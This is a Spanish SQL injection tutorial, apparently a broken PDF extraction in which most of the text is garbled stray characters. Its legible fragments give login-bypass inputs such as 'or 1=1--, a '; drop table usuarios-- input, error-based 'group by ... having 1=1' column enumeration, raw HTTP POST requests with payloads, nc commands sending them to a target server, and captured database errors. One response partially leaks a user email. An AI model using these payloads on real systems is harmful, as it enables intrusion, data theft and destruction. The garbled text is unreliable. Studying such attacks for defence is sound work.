Técnicas de SQL Injection: Un Repaso

Anuncio
!
!
#$%&
"
'
" * +"
(
,# .
/
"0#$%
'
"
, *
) 1 % )" + !
"
, *
, ")
- **
2 #$% '
"- " "
3 #$% 4
)
?
@
B
C
) 5
,
! )
%"
"
5 "
67"
* 8*
"
. 5 9 ", #
:)
*
*
#.
8<
+
"
" )
>; ) 5
4 '
" ;
4 #
!
4 ! ', *
#$% 4
: "'
"
' "
"A
"
*
"+%
"'
; "
A " "' ) "
5.
"
""
) " " "
! 6 . "
#$% 4
+ ;7
"
.
/
;
" =
"
"
" .>
", "
"
" 8<
" "
#
,
"
!
,
"
"
"
"
"
#
8
"
)4
" 7
# )
"
"
+ =
)
& " +
. "
!
.
7
6
&
"
"+
"
9
&
"
" "
. "
( "
&
D
"
9 &
"
"
(
*
6
+
*
"
6
.
"
" 6 ( ""
" 4 ""
"
7<
"
) "
"
" "
"
&"
"
"& "=
. (( #
+
2
;
" "
"
*
5
"
.
"
6 " .
"
"
" 6
"
)
&
"
(
"
")
)
* 9
"
7 " 6 (&
. 4 #$%&
" "
" "
" *
"
9
"
"
$
!% & '
5 *
"
D
C 2
.
6 " .
'
"
* 9
"
" 9 ( " ) 4
&
"
* )
4 "
"
%
#8$ 8%
*
*
&
!
% .
. =
4 " " "
"
+&
"& +
"
D "
"
"
&
.
"
)
" "
*
(
&
"
"
"
)4
"
) 4 )
6
9
"
( )
"
+
8 . "
6 7 "
6 " . "&
*
9
"
&
"
>#
"
"
) "
"
9
. 4 #$% " 6
E#+) " & :
+
"
51#
CB@ +
"
9
"
.& 9
+" " ")
"
*
"
)
"
. 4
"& 9
"
") " "
.
"
4
"
. 4
+ % . . >
*
6
D
C &
#8$ 8%
#$% E#
$ + % . . F
$
" D "
,-
&
9
9
+ =
*
<F
#: * "
" 6"
.=
.
"
. 4
4
"
6 "
. 4 "
"
"
*
CB
" #$%BC + #$%C &
"
6
"
"
"
6
.
"
"
"
"
"
+
(
"
&
"
"
)
6 "
"
>!
#$%>
"
9
4 "
) )
"
6
"
" . "
4 " "=
9
"
#$%2
.
6
"& 9
"
+
6 6 "
6
. 4
(
) * # +,
$ ( " " "
"
" ) "
"
" 9
- +
" *&
) 4 ) 4
"
"
9 " =
" "
=
,:# !
9
"&
9
" *
"
& " )
) 4
9 "
6 "
2
G
" E,
.
*
&
" 6 "
"
"
"
""
F&
" *
) "
D= " " )
" ) :# & " "
" )
"
)
"
.
" 6
"
!'
"
"
%51
3
5
) &
( ) "
"C &
9 "
& )
9
. )
"
6"
9
4
& "
9
" )
*
" . =
"
6 6 "
# &
)
" 6 "
2F
" 9
" *
9
"
)
:# 2
%
"
)
7
" 9
" ") "
) "
"
9
"
8
""
:#
"
6 &
6
'
"
9
&
- "
*
"
"
*
"
, "
"
6 "6 "
"
#$% @
&
"
"
.
"
"
"
"
"
.
"
" "&
"
"&
"-
.#
'
*
"
/
" .
) =
.
!
0
9
6 "& +
9 6
"
"
"
" .
)
*
=
9
"
6
6
"
#+) "
:#
+
G
+
9
"
" 1;& +
" *
0 "
"
" * #$%& " *
9 ( " .
CC?
"
"9
.
)
"
#0#$%& ) 4
&
"
"
F&
"
"
"
6 "
#$%
.
&
"
" *
,
)
-
6 "
)
" 1;> H "
D CC2
"
&"
"
G
&
#+) "
5
)=
" "
"
.
E#$%
6 "
"
9
.
"
"
)
) "
" 1;
67"
"
CCB
.
)
9
9 " )
" - "
9 "
. "
" .
" "
9
D CC
=
" * #$% # 6 3 *
( "
"
) >
( =
& +
9
=
( )
.
"9
"
.
6
, "
G
&
"
" *
=
"
"
,
"
:#
" )
7"
"
"
&"
*
*
"9
" *&
2
G
" 1;
" .
"
9
"
"
E!
9
) 4 =
"
" * #$% " 6 "
&
"
I)
&
"
" )
.
( #$% # 6
&
"6
)
"
"
&
"
" "
"
6 4 ""
&
9
"
"
"
"
4
6
" "
=" "
*
9
9
#$% # 6
& "
" "
"
"
""
<
" *&
*
"
"& "
" "
"
.
+
) "
"
?
# )
4
)6
")
& *
" "
) =
+
"
" #$% )
" &
"
"
) "
"
. 9
.
&
"9
"
"
&
"9 &
"
)
"
) 4
"
E' "
" "
"
#0#$% # 6 & 9
"
)
" ) 4
.
&
"
+
"
J
6"
8
6
"
"
"
)
&
"
"
.
"
"
.
"
.
)4
"
F
%#
"
&
"
6 &
.
"
"
" #0#$%& "
" "&
9
8
"
>#5> +
"
8
)
<
"
#$%
9
"
#0#$% 9
" 9 "
4
"
"
5
E8"
# 6 &
5
) "
6
+ )
"
.
=
<
<
6 "
"
""
&
"
9
(
) "
)
+*
"
"
"
"
" .
) " "
" I
+
) 4
&
"
&
*
"
6
#0#$% # 6 &
""
6
"
"
1 % )"
F
+ =
"
*
"
"
"
*
"& ) = "
4 "
"
) 4
"
"
"
"
"
)7
&
" E#51& 5
; M& !N #!N& ;'!&
(
9
" 9 "
"
& "
" " ;'! ! + 1
!
"
&
"
"
+
F
*
4
4
9
"
"
"
"
"
"&
.
"
"
)
" )
"9
"
9
.
"
= &
9
(.
"
"6
4 " EIF
"
) "
" "&"
6 . "&
"
4
"
"6
"
".
" *
.
"
> > EKKF
"
"
"
"
6
7
"&
+ " 6
""
"*
( 1
( * $#
#0#$%
6
L"&
.
"
"
"
6
#0#$%
"
#5 "
"
"
<
"
"
5
") "
" "
)
;
"
"
"
"
"
9
"
&
" 6
;'! 332
.
"
"
" 9
"
#0#$%
.
)9
#0#$%
@
8
*
6 "
6 #$% E!
4
7
& "
6
"&
"6
)
)
" "
=
#5
"
9
+
""
> >F "
"9 6
#$%
)7
"&
;:,:#
.
"
"
" D "
"
.
"
"
"
"
"
"
"
"
) "
.
" *
"
"
1
+ (
&
,#))
;
, 6
% *
#$% # 6 > O#$% # 6
"*
"
- ** "
"
" > 8"
9
"
" *
6
P
&
,!
"
)
<
" "6
"
"
.
"
"
+"
"
")
9
5
"
"
"
"
"
)
!
" Q
" Q
" Q .
9
"
<
"
"
"
"
&
"
"
) **
#$%&
>
M . 8< " G
) **
" )
"
>" 6Q
* EF>
""
Q M9
Q
"
Q <
Q" "9 "
Q"9 .
6= "
&
"
")
")
" < =
> E #-1 B303B 022CB0@F
)
<
<
<
<
<
<
)
"
6 "&
"
"
"
"
"
# )
*
"
"
9
*
"
#$% # 6
9
)
". *
>;
! *
" "
, ")
1: < "
" + "
"
"
"&
"
"
+
"
>
M . 8< "
" 9
Q
Q"
Q "
Q
" "
6
"
<
<
<
<
+
"
6)
-"""
" Q "
" Q
"
+
+
+
""
"
>&
"
G
(
"
"2
% &
;
,
"
"
"
6
"
"
)
& #$% "
*
" <"
"
"
:
& ; " 0#$%
"& < "
.
"
& "
" "
.
"
% &
/ 51;
8H:R8
,81S
+%
+
++
+
"&
"
"
"
(
" "
" "
"
6
.
.# .
&
6 " ) "&
" =
) " =
"
" ) " . .
*
"
"
*
#!
.# .
." "
"
"* .
.
"
."
"6
" "
."
(
"
&
) "
"
J
*
"
*
"
"
"9
) "
"
"
"+
"
)
) "
"
"
*
(
"
*
"
%! # #!
(
A :
G 8 8
(
(
/ : ! -S
5H 1/
: ,8 -S
"
&
.
(
.
6
"
.# .
+ )
"
"
*
!
(
,8%8;8
""
%
+
(
!,5;8
%! # #!
% "
"
" "
*
)
1#8 ;
5
" E!%0#$%
" *F
"
(
+
"
"
"
"
(
8
5%;8
#8%8';
"
(
(
(
% &
' 85;8
, :!
% &
. 4
(
(
"
*
"
"
*
" ." "9
"
.
"
< "
)
" ."
" 6
"
"
"9
)
" 6
"
" ." ""
"
" =* "
9
) " "*
.
" ." ""
"
"
*
"9
B
3
% &
T
U
TU
TV
UV
V
-8;G881
% R8
1
+
,"
.
.
9
+
(
.
*
"
9
9
9
9
6
6
"
(
(
"
*
."
"
) "
"
4 & !
SELECT * FROM Tabla;
E8"
"
6 6
"
"
"
."
"
) >; ) >F
UPADTE Tabla SET password = 'Juajuajua' WHERE user =
'admin'
E8" "
( =
""
"
&
6
F
5
4
"
)
&
"
"
"
"&
"
"
"
9
. 4 #$%& "
4
"
" !
4
4
"
# )
"
&
"
6
"
&
9
6
"
"
#$% "
"
=
& "
"
"
"
"
""
"
4
"
"
"
+
#$%
&
. *
" )
&
"
&
7
9
"
+
4
"
*
*
"*
& "
"
6 " 9
+
.
"
9
")
"5
#
#
67
"
H
)
")
" 9
=
"
&
.
(
.
"
'
*
"
.
8
&
>&
"
"
"
9 "& " .
" >5 9 "
9
*
6 &
"
"9
" #$% )
"&
"
C
"
6
"
" )
" " =
# )
&
)4
<
6
"
" )
" .
*
" *
" "
"6 "
"
"
") " " "
" 6
"
9
.
" *
"
"
"
!
.
4
"
"
. 4
. "
)4 6
" &+
"
"
"
) 4
*
*
( 6!
# )
) "
6
&
"
"
9
8"
"
4
#$%&
5
+
4
>#$%
#0#$%&
" *
"
"
"".
"
"
" 8
"
" =
"
*
.
9
*
+
9 .
)4 6
"
4
>
"
"9
&
)
" "
.
J
"
"
&
9
<
(
*
4
"
8"
"
"
"
"
9
+
&) 4
"
7
"
.
&
"
"
"
&
"
#
! 6 . "
#$%
6
"
"
" 7
.J
.
&
"
)
.
"
"
0 8*
"
05 9 ", #
0 :)
*
0 8<
+
0'
" ;
,
J
#
9
"
" !
"
"&
& "
6"
<
)
9 "
5
*
"
"
6
+
6
9
)
7<
". *
"
6
"9
9
. "
&.
"
"*
" ) " "
"9 6
"
+ ""
) "
"
"
" 6
" )
"
4! $ (! &
9
"
" 6
.= "
"
"
"
"
)
"
"G
"
"
"
5#!
=" " 9
&*
"
<
"
"
" 6
"
<
"
* "& "
".
*
"
" =*
*
# 6 "
) " "
" #0
G
"
9
*
"
"
( "
7<
"
"
"
8
9
+
6
"9
(
"
8"
9
"
= "
"
&
"9
"
"
)
"
9
"
)
6"
"
"
) "
&
" "
*
" D
+
:M&
"
" " "
"
"+
8
"
"
"
"
)
&" "
6
"
"&
)
"
)
6 (
&
"
=
"
""
"
=
"
"
6
)& "
) "
" 6
"
"
"
9
"
" : %
*
"
)
"
&
+ =
) "
"
"
.
.
<
"
.
.J
6
"
"
" *
9 "
"
"
"
&
" "& "
)
"
)9
"
"
)&
" 6
"& + " )
. "
"
)
) M.
"
*
"
*
*
6
"
"
"
6
""
"
"
"
"
"&
)7
;
)
+ =
6
6
" )
) 4
"
(
"
6"
) "
"
.
"
"
"
*
.
) "
<FORM action=logon/logon.asp method=post>
<input type=hidden username=_UserName password=_Password>
</FORM>
8"
* .
9
+
"
J
.
"
"
"
"
. " "
. &) "
" 6
"
"
5#!
"
"
F 8
+
6
"
"
"
&
(
"
. " "
.
5#!
) "
" E!
*
; %& 9
) "
"& .
; % + 6 6
&
*
&
)
"
. " "
*
6
+
. "=
<
*
) )
select * from users where username = _UserName and
password = _Password
5
*
"
)
9
"
"
"
6 "
6 6
"
" "
"
.
"
"II )
&
"
4
(
"
&
"
"= +
"
"
" .
&" .
&
"
&
+
) )
"
"
<
"
%
"
)
"
*
"
"
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
!
"
" & "
"
"
" ) +
)
"
"
L1 6
) L " "
"
"
) 4
.
"*
" "
"
%
9
"
=
+
)
"
"
"
"
.
"
.= EN,F
)7 " "
6
.
5#! 9
8 "
" &
+
) )
.
)
"
"
"
. 9
*
6 " 6
.
"
select * from numeros_anteriores where edicion =
'Noviembre'
"
#$% >
"
&
"
6
9
=
>&
.
&
"
) "
" "
+
"
"
9
.
& "
"
" "*
"
"
"
"
*
.
"
)
7
"
"
+ " +
"
9
+
9
) "
#$%
5
6
"
&
E'
"
" "
F
#
) "
"
" !
"
% L E'
#
"
4
&"
+
9
"
)
*
+
F "
"&
"
"
""
" "
) 4
"
" )
L
"
")
+
" * #$% # 6
"
"
*
*
6
9
9
"
9
6
"" "
)
#$%
9
*
"
(
"9
4
(
" 4
&
(
"
.
H
"
"
=
.
"
"
"
" +
&
"
"
"
"
)
"
Usuario : An'gel
Password : 338xD
select * from users where username = 'An'gel' and
password = '338xD'
.
select * from numeros_anteriores where edicion =
'N'oviembre'
8
) "
"
.
" " 9 "
#$% # 6 & " 9
.
"
"
" .
9
" ""
&
"
(
""
"
9
"
"
"
"
+
username = 'An'
edicion = 'N'
% . & ".
"&
"
"
5
"
)
9
"
""
8
"
9
"
#$%& *
"
" = "
&
.
6
"
67"
" 4
"
"
+
&
"
.
"
4
"
9 9
"
#$% # 6
( &
&
". *
"
"
L5 L + L1L II
9
.
"6"
) "
"+ "
"
*
"
"
(
9
+
*
9
6
"
"
.
"9
.J
6
"
*
%& "
" "
&
(
* "
)
"&
.
"
8" "
"
) "
8
"
*
"
+
A
*
6
"
") " "
"
"
"
6 &
6 6
9
"
.
) =
& 9
"
"
)7 " ".
9 "
7
"
"
# 6
" . #$%
(
(
6
)
"
E84
"
)4
.
"
.
& " 6
9
" " "
+
) 4
" "
" . &
"
6 "&
" *
"
9
6
" "
&
) )
"
"
)"
"
"
"
"
"
.
. "
.
"
.J .
"
"
"
&
7<
)
"
&
<
"
4
9
)7 & "
"
"
" 6
"
"
"
?
>8
# 6
>F
"6 "
9
+
#$%
" 6 )
" " 9
"&
9
) "
" ) 4 + "
(
"
' " '
&
"
) 4 >
. #$%
> EH
B
*
" +
"
"F
9
"
"
*
.
".
"
<
2
1
$
%
&
'
+!
0
(#)*
,
-.
,
/
%
,
,
-
123
% &
)
"
&
6
9
*
&
)
+
"
(
"
*
" I
"" "
) "
"
+ =
"
&
"9
""
"" .
)4 6 6
6
"
"
!8 (
.
" 7
"
#$% 4
.
"
9
" " "& 9
; %& 5#!& & "
" " 6 ( 9
# 6 '
" 9
"
)
"&
6
) & "
&
4
& .
&
6
" "*
"
)
& " > 6
* "6 & " " .
9 &
4
&
) "=
8
"
*
" &
) "
"
)
.
"
*
.
.
>.
. >F
" > )
7
"6
#
"
"&
" "& +
"9
.J ) "
E!
" ."
>
>% "
'
">
"
) "
"
"
"
9
"
" "
)
9
;:,5 *
" " 6 (
!
"
(
&"
.
"
=
&
"
.
.
"
"
"
"&
)
"
"
" " "
" "
" "
"
9
7
= "
" "6
"
)
" " * " *
"
)
6
& "=
" "
"
"&
.
"
"
+ =
"
.
" 7
9
.
&
6
" # )
& 1: )
)
"
"
&
"6
"
"
) E8"
"
" )
6 "+
.
F
*
+ =
)
. "
"
"
"
. "
"
"
<
#$%
"&
.J "
"
+
) 4
*
" EH > % "
'
">F
" >
"
9
& "
6
" " 9
)7
">
" )
) "
"
6
"
6=
"> "
*
*
"
"&
+J
" &
.
"
. " =
) "
9 "
3
$
(!
6)
"
"
"
"
"
"
/
!
"+
"
" "
* "
6"
"
H 7
"
"
! "
*
=
"
.
"&
"
"
.
#$%
""
"
. I) &
E> L >F
*
" )
6
"
+
"
=
(!
"
.J
"
"
"
"6"
+
"
9
*
"
.
" " "
"
"
; % 5#!&
*
"
"
"
"
9 6
"9
"
"
" 6 "&
. "
# 5 : + !5##G: , "
"
.
5#! 9
)
"
+
6
#$% ; ) 7
=
"
9 *
"
" 6
#$%
"
<""
.
" "
" 4
"
"
6
+ =
)
*
) &
3(
"
& #
" : 0% &
"
" "+
"
.= & ! . "
" " D "
9
6" +
) " <
"
"+*
" " "
"
&
9
4 4 4
)
"
.
"
4 " "
"
"
" "" "
" )
"&
9
"
"& "
. "
"
6"
*
.
5 "
"
"
" &
)
)
*
"&
)
. "
"
+
* "&
" " )
6 " "
"
"
*
"
.
9
.
!
6
"
"
. *=
"
"
=
"
"
"& : 0%
.=
""
$
! .
86
,
*
"
"
"
) &
"
4
8"
"
* .
<
=
"
)
. *=
---- Extracto ------------------------------------------<FORM action=ingreso.asp method=post>
<TABLE cellSpacing=1 cellPadding=3 width=440
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
?
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto ------------------------------------------!
"
9
.
4
*
5#! E!
"9
5
) &"
9 6
"
"
" "
)
.
(
"
=
" &
) 4
&
" F
. "
(
; %
. " " &
" " "
"
"
"
9
*
+
9
"
#$% " 6
"6"
"& +
"
"
"&
"
)
"
select * from users where username = 'Angel' and password
= '338xD'
!
"
"
9
) "
(
"
"9
"
+
(
""
.
"
)
*
<"
6
9 =
6
)
)
"
9
*
"
+
"
)
*
4
=
"
"
#$%
"
"
" D
.
"
"
I :M&
"
+
'or 1=1—
"
6
"
.
"
Usuario : 'or 1=1-! ""
L
V W
A 47
"
"&
.
9
=
"
.
)
select * from users where username = ' or 1=1-- and
password = ' or 1=1--
+
@
1
9
"
""
.
9
"
1
(
"
6 6
+ =
<"
"
"
"
" "
6
"
"6
E
""
"
"
>: > 9 "
"
)
. "
"
&
F&
,
0
4
Usuario : 'OR''='
Password : 'OR''='
5
4/
'
)
" > "
# )
"
&
"
">&
"
#$%
"&
.
+
"
<
"
(
7
" .
+
&
(
#.
""
+
"
6 .
"
4
)4
.
"
& "
"
&
"
6
+
> 00 > E, )
&
#$% 9
.
" "
6 &
.J
"
& "
)
"
6 "
&
6 4 .
F
"
" "
9 6 .
9
.
"
6"
"
"
"&
" " "
*
"
/
" .
"
>5
>
9
>
<"
> "
=
Usuario : Admin'-Password : 'or 1=1-8
= &
"
9
"
"
=
"
" "
.
select * from users where username = 'Admin'-- and
password = ' or 1=1-#
.
8
E'
6
"
*
"= + " .
"
&
"6"
"
9
4
) 6
F
"
"
+
&
) )
+
"
"
">L>
" + > 00 > E, ) /
F
"
< "&
" )
"
"
"
" > "
"
.
">
"
) 4)
5 "
#$%
6 . "
"
"
#
'
*
+ =
$ 7! .
"
+
" )
"
"
.
"
"&
9
6
"
J
"
"
*
"
) 4
"
" 9
6
" *
"
6 .
.
""
5
6
!
"
9
"
>
"
9 "
<
+
"
" .
""
"
6
"
&
.
"
)
"
9 D
"
(
)
* "
)
)
"
"
*
"
<
"
" )
9
" .9
+
&
6
=
"
"
)
) "&
"
"
.
". *
1
"
*
"
) "
6 " )4
) "
" )4
"
"
8
". *
6" "
"
+
%
#
#$% # 6 &
+
"
&
" 6 . "
" 6
& "
>
"
& " ) +>
>
" "
) "
" #$% # 6
"
" " "
"&
"
"9 "
.
"
"
"
)
"
9
> 9 "
+
*.
" "
"
"
E'
+ <
" F& " "
"
"
"
" " .
&
. 9
"
" ) " "
"& +
" 9
"
"
&
4
&
"
6
"
" "
"
" 6 " "
"
& " 6 "
4
& "
+ *
"
" )
"
<
6 . &
" "
" .
"
'
;
""
6
##$%#8 H8
<
>< Q
)
"
)Q
"&
"*
. & "
*
"
$ 7! .
"
)
#
"
" "
17 !
"
".
& ) 4
! "
6
"
6
"
" *
"& +
" *
) "
"
8
4
.J
" " "& "
" " ) "+
B
. 6 9# +
&
% " 9 " , .
# 6
&
"
6"
"
"
"
" E8 "
"
) "
=
"&
4
"
(
+ ( & F
5
9
*
6
9
"
"
"
6
" &6
9
4
" "
)
"
"9
.J
4
"
&
.
" " 6
.
&
+
M
#$%&
"
"
&"
" " D "
" E' =
" 5
9
" 9 "
.
"
" 6
*
"
&
"
=
8
"
.
"
"6"
"
. 6 9
J
"
" "
)
&
"
"
=
4
&
F
&
*
" 9
*
&
&
Usuario : '; drop table usuarios-Password :
#
*
EH
"
) )
)
&
'
6
"
*
>8*
.J
&
9
7
"
> "
&"
"
"
"> "
! 6
&
"
*
+
) (
, # "
" )
"&
"
"
"
"
&
"
6
&
"
"9
)
. "
>F &
"
. "
9
*
"
"
9
"
6
"
"
5"= +
6
"
(
&
.
) = "
&
+
1
$
%
+
67
)
: 3(
! ) )
7
"
) &
#$%
(
4
"
D
# )
"
"
"
"
.
%
& 4/
.
$
!
#&
" *
"
"
"
"
(
& "
" ")
" 9 )
" :,-' :%8 ,4 "
#$% # 6
.
"
9 &
&
"
" "E
)
"6
&
+
"
.
"
"9
"&
"
)
. "
) "
"
) "
. 7<
"
"
&
( = &
9
"
"
*
F
C
"9
1
"
"
"6
) "
8
&
"
"
"9
) "
! "
"
"
" D
6
6") "
. "
&" "
&+
" 4 " "
"
+
"
6 ("
"&
+*
"
*
.1)
8
6
+
"9
*
" "
" 6 (
".
> L > E'
*
"
"
4
#
9
"
6
"
"
<
"
"
"
&
"
"
F
"
& 6
"
"
)
"
" .
Warning: SQL error: [Microsoft][ODBC SQL Server
Driver][SQL Server]Unclosed quotation mark before the
character string '\')'., SQL state 37000 in SQLExecDirect
in php/db_odbc.inc on line 61 Database error: Invalid
SQL: Select * from usuario where (usuario.login='\'')
ODBC Error: 1 (General Error (The ODBC interface cannot
return detailed error messages).) Session halted.
-
&
6
:)6
%
"
E
2 !
3 8
?
.
1
"9
*
" <
" * #$%
<
) "
" "
>
)Q )
>F
"
*
)Q )
&
)
) "
"
(
" "
" "> . >
&
"
"
:,-'
"
" 9
"
6 +
:,-' 8
"
)Q
.
"
"
9
6"
"
"> "
.
>
*
)
3
%
)
010.8#* - "3.9$
(")-#)
123
:;<<
9
+
----- Fragmento ----------------------------------------<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
([email protected])
*
Modified by XXXXXXXXXXXXXXXXXXXX
([email protected])
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class
var
var
var
var
var
var
var
var
var
DB_Sql {
$Host
= "";
$Database = "";
$User
= "";
$Password = "";
$UseODBCCursor = 0;
$Link_ID
$Query_ID
$Record
$Row
var $Errno
var $Error
=
=
=
=
0;
0;
array();
0;
= 0;
= "";
----- Fragmento ----------------------------------------6
"
"
. &"
*
*
A
*
"
)Q )
"
"
"
>" " >
" 6
) " X " + X! ""
"
9
"
( " " "
. "
"6
&
.
" 6
4
*
. 9
& " "& 9
*
9
9 6
"
" + 6
&
"
" .
"
"
.
"
"
<
9
"
" )
E8 "
"
F
:
) &
*
/
:M& 6
"
"
* 6
"
"&
*
+ "
"
"
+
. &
" 9
4
.
6
"
"
"
"
"
"
"
=
#$%&
6 "
" 6
"
) "
"
"
!
9
+
#$%
) "
)
9
" "
4
)
"
) "
"
.
"
*
"
+
6
+
8
"
"
"
(
6
"
7
"
#$%
"
4
"
&
"
(
&
"
"
! " 9
6 4 6 "
" )
"
) "
"
#
"6
"
"&
"
"
&
J
*
" "
) < 9
"
"
"
(
6
+)
"
"
"
9
"
"
B
"
*
"
.
7
"
9 D "
<
&
"
" 9
" 6 " " "
;;!
"
)4 6 & "
6 "
<
&
&
".
*
"'
"+%
) 4
F
9
7
"
<
""
"
"
"
" 6
% E8
"'
".
"
.
" 9
"
;;!
M
"F&
E5 .
. =
6
" "&
"
6 &
"
*
"
(
"
6
nc -vv www.objetivo.com 80 < sentencias.txt
'
'
"
&
(
8
9
)
"
"
8" *
+
+
" *
" **
*
F&
.
" D " *
"
"
;;!
*
E8 "
" * # +1 &
"
.
"
) )4 6
. "
" E5 .
) " " " F& "
6
"
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Angel&txtPassword=Angel
Y
Y
Y
H
. "
>! ""
>
Y
Y
H
*
-
&
"
! "
" "
*
(
*
8
"
.
. "
9
""
<
6
"
"
"
+
&
6 6
" ) "
!
"
"
"
*
9
"
7
) 4
!:#; )
<&
4
"
"
.
" .
+
)
"
)
> L > E'
9
"
(
6
"
"
F
&
*
" 6
"
)
"
"
"
E 6 .& .
6
""
(
>
" >
">
#$%&
" *
6
9 #$% E
4
:%8 ,-F )
"
"
"
6
" "
"
"
>
"
)4
H 6
(
"
"
> "
.
" .
" **
) "
9
)
*
"
4
!:#; 9
> "
"
"
<
"
6
6
" )" 6
6
(
"
)+&
)
" #$% 9
F
"
' " "
" *
"
9
< &
"
4
"&
" 4 " *
6 "
" "
" 6=
"
"
"
*
(
6
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L 6 . V 00 E8
Z
6 .[ Z2, 00F
"
2
1
.
$
3
"
=
)*1(
5*'>
!
"
"
)
"
)
"
"
% )
9 6
6"
"". " "
">
>
"
"
"
"
6
!
\
]
5
!
[
0
^
Q
9
6=
"
6
"
"
(
"
& +6
(
9 "
9
"
)
"
Z 0
Z?'
Q
4
<& "
"
9
"
"
!
6"
9
"
;;!
"
Z
Z2Z25
[ Z
Z2,
Z '
Z B
Z C
Z28
Z2'
"
- M# "
"
9
"
"
8
*
"
"
"
4
=
"
!:#;&
"
+
'
#
!
+'
, "!
"
8"
#.
.
'
! 7 ""
! 7 ""
+
OO
V
&
E
F
U
T
:MK
6
""
" " "
(
6
6=
"
&+ 6
"
"
"
)
"9
"
nc -vv www.objetivo.com 80 < Injection.txt > result.html
-
6
"9
)
!
"
"
"
*
"
H
"
9
6"
"
"
9
9
4
"
*
&
"
""
"
.
"
"
+
"
"
+
"
9
.
"
" *
"
4
"
> 6 .>&
"
& "
"
7
)
3
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
! *
KK "
"
" 4 "
)
) "
E # 5 :#F& "=
"
5
"
"
H
9
6 6
"
"&
"
6
"
)7
"
9
&
&
"
=
:,-'
(
)
*
) &
" *
< +
(
"
"
"
"
"
6 !:#;
4
"
" )" 6 9
#$% # 6
" 6 6
*
"
"
.
" E " ,F
*
"
"
)
.
= &
*
"
# 5 :#
)
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-&txtPassword=Angel
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
H
+
L.
)+ "
" " , 6 . V 00
% .
"
4
6
"
=
&6
"
".
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select
?
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
6 (
"
" 6 (
+
"
"
#.
,
)
"
"
> . " >
> 6 >
"
&
" 9
"
# 5 :#&
.= & "
"
" 9
" )
"
>.
"
)+>
"
"
# 5 :#
"
"&
"
+
8" " =
"
> 6 .>
" )
,
"
)
*
"
"
(
"+
"
*
'group by usuarios.UserID,usuarios.UID having 1=1-#!
!
*
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1—
#!
!
*
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
@
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1-#!
!
*
HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date:
Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23
GMT Connection: close Location: PaginaPersonal.asp
Content-Length: 139 Content-Type: text/html Set-Cookie:
xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US
